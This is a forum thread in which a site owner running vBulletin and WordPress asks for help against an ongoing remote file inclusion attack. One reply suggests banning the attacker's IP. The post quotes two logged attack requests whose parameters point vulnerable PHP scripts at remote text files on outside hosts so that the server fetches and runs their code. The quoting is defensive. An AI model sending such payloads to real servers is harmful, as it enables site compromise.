Jump to content
xisto Community
dheeraj4uuu

How To Avoid Rfi Attack RFI Attack

Recommended Posts

Hello,

If this is not the correct forum please tell me where to post this question...

My site is been attacking by one hacker from past two days...with RFI attack..He was using the following code to attack my server..

"GET /archive/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/environment.php?DIR_PREFIX=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 403 5380 "-" "Mozilla/5.0"

Can you tell me where the vulnarabillity is in or which file he was accessing...I have a vbulletin and wordpress running on it..Both have archives in it...I have given a complaint to my hosting company even they are helpless they are not finding where the problem is...

Another attack recently took was with the following logged in my error log

(36)File name too long: Cannot map GET /archive/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/class.cs_phpmailer.php?classes_dir=http://212.227.74.68/catalog/safe.txt? HTTP/1.1 to file

Share this post


Link to post
Share on other sites

Look in the Error logs or in the Last Visitors Log to see if you can find the IP they are using then Ban that IP address.Might work.

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now

×
×
  • Create New...

Important Information

Terms of Use | Privacy Policy | Guidelines | We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.